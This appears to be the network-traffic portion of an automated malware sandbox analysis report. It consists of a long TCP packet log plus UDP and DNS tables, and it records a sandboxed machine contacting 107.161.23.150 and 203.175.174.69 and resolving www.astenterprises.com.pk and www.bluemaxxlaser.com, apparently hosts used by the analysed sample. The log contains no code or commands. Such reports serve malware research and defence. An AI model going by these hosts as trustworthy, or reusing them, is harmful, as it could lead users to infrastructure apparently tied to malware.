                                                                                              Dec 19, 2024 12:51:20.929415941 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.929439068 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.929575920 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:20.929593086 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.929634094 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:20.957405090 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.957422018 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.957655907 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:20.957665920 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.957711935 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:20.981509924 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.981540918 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.981614113 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:20.981620073 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:20.981668949 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.108844995 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.108867884 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.108988047 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.109003067 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.109040976 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.126651049 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.126674891 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.126921892 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.126935959 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.126975060 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.146833897 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.146867037 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.146956921 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.146969080 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.147012949 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.147037983 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.166378021 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.166394949 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.166623116 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.166650057 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.166709900 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.183621883 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.183639050 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.183748007 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.183768034 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.183809996 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.203679085 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.203722000 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.203772068 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.203780890 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.203804970 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.203818083 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.306407928 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.306417942 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.306591988 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.306607962 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.306664944 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.321078062 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.321096897 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.321196079 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.321206093 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.321244001 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.334949017 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.334966898 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.335064888 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.335072041 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.335104942 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.346784115 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.346800089 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.346879005 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.346887112 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.346924067 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.359597921 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.359615088 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.359699965 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.359709024 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.359762907 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.373040915 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.373060942 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.373132944 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.373142958 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.373187065 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.386499882 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.386517048 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.386605024 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.386612892 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.386651039 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.485505104 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.485539913 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.485622883 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.485635042 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.485662937 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.485678911 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.495570898 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.495589018 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.495656013 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.495662928 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.495704889 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.504982948 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.504998922 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.505053043 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.505058050 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.505099058 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.513878107 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.513895035 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.513942003 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.513948917 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.513971090 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.513984919 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.522780895 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.522800922 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.522856951 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.522864103 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.522891045 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.522919893 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.531169891 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.531186104 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.531234980 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.531244040 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.531275988 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.540229082 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.540245056 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.540311098 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.540317059 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.540355921 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.548007965 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.548038006 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.548065901 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.548074007 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.548095942 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.548111916 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.677855968 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.677875996 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.677993059 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.678006887 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.678046942 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.684251070 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.684278011 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.684357882 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.684369087 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.684408903 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.691332102 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.691359043 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.691440105 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.691447020 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.691483974 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.697921991 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.697969913 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.698013067 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.698021889 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.698051929 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.698067904 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.704850912 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.704895020 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.704941034 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.704948902 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.704974890 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.704992056 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.711673021 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.711747885 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.711767912 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.711776018 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.711802959 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.711817980 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.718460083 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.718522072 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.718669891 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.718681097 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.718724966 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.725642920 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.725687981 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.725722075 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.725728989 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.725763083 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.725774050 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.871762037 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.871793032 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.871848106 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.871870995 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.871902943 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.871918917 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.876473904 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.876497030 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.876557112 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.876565933 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.876597881 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.876611948 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.883462906 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.883510113 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.883549929 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.883557081 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.883595943 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.883620977 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.889801025 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.889846087 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.889873981 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.889882088 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.889924049 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.896915913 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.896962881 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.896990061 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.897002935 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.897027016 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.897058010 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.903548956 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.903568983 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.903618097 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.903626919 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.903662920 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.903675079 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.910448074 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.910470963 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.910526991 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.910537004 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.910564899 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.917757034 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.917818069 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.917830944 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:21.917840958 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:21.917879105 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.062160015 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.062206030 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.062246084 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.062256098 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.062376976 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.062376976 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.068458080 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.068487883 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.068528891 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.068536043 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.068567038 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.068582058 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.075514078 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.075547934 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.075586081 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.075592041 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.075629950 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.081828117 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.081856966 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.081897020 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.081904888 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.081939936 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.081948996 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.088792086 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.088821888 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.088865042 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.088872910 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.088901997 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.088924885 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.095637083 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.095662117 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.095722914 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.095730066 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.095771074 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.102580070 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.102611065 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.102657080 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.102663040 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.102685928 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.102703094 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.109735012 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.109765053 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.109819889 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.109827995 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.109846115 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.109873056 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.253968954 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.254002094 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.254131079 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.254154921 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.254455090 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.260477066 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.260498047 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.260560036 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.260576963 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.260626078 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.261703014 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.261759996 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.261765957 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.261781931 CET44349704107.161.23.150192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.261805058 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.261831999 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.264470100 CET49704443192.168.2.5107.161.23.150
                                                                                              Dec 19, 2024 12:51:22.512603045 CET4970580192.168.2.5203.175.174.69
                                                                                              Dec 19, 2024 12:51:22.632304907 CET8049705203.175.174.69192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.632375002 CET4970580192.168.2.5203.175.174.69
                                                                                              Dec 19, 2024 12:51:22.632498026 CET4970580192.168.2.5203.175.174.69
                                                                                              Dec 19, 2024 12:51:22.751992941 CET8049705203.175.174.69192.168.2.5
                                                                                              Dec 19, 2024 12:51:24.167141914 CET8049705203.175.174.69192.168.2.5
                                                                                              Dec 19, 2024 12:51:24.212836027 CET4970580192.168.2.5203.175.174.69
                                                                                              Dec 19, 2024 12:51:25.176598072 CET4970580192.168.2.5203.175.174.69

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 19, 2024 12:51:18.669123888 CET5806653192.168.2.51.1.1.1
                                                                                              Dec 19, 2024 12:51:18.807569981 CET53580661.1.1.1192.168.2.5
                                                                                              Dec 19, 2024 12:51:22.374206066 CET4926353192.168.2.51.1.1.1
                                                                                              Dec 19, 2024 12:51:22.511921883 CET53492631.1.1.1192.168.2.5
                                                                                              Dec 19, 2024 12:51:31.767777920 CET5382853192.168.2.51.1.1.1
                                                                                              Dec 19, 2024 12:51:45.760885954 CET6126053192.168.2.51.1.1.1
                                                                                              Dec 19, 2024 12:52:01.779092073 CET5007753192.168.2.51.1.1.1

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 19, 2024 12:51:18.669123888 CET192.168.2.51.1.1.10x182cStandard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:22.374206066 CET192.168.2.51.1.1.10x6952Standard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:31.767777920 CET192.168.2.51.1.1.10x4aabStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:45.760885954 CET192.168.2.51.1.1.10x8bbfStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:52:01.779092073 CET192.168.2.51.1.1.10x61d4Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 19, 2024 12:51:18.807569981 CET1.1.1.1192.168.2.50x182cNo error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:18.807569981 CET1.1.1.1192.168.2.50x182cNo error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:22.511921883 CET1.1.1.1192.168.2.50x6952No error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:28.983484030 CET1.1.1.1192.168.2.50x531bNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:28.983484030 CET1.1.1.1192.168.2.50x531bNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:28.983484030 CET1.1.1.1192.168.2.50x531bNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:28.983484030 CET1.1.1.1192.168.2.50x531bNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                              Dec 19, 2024 12:51:28.983484030 CET1.1.1.1192.168.2.50x531bNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.20A (IP address)IN (0x0001)false
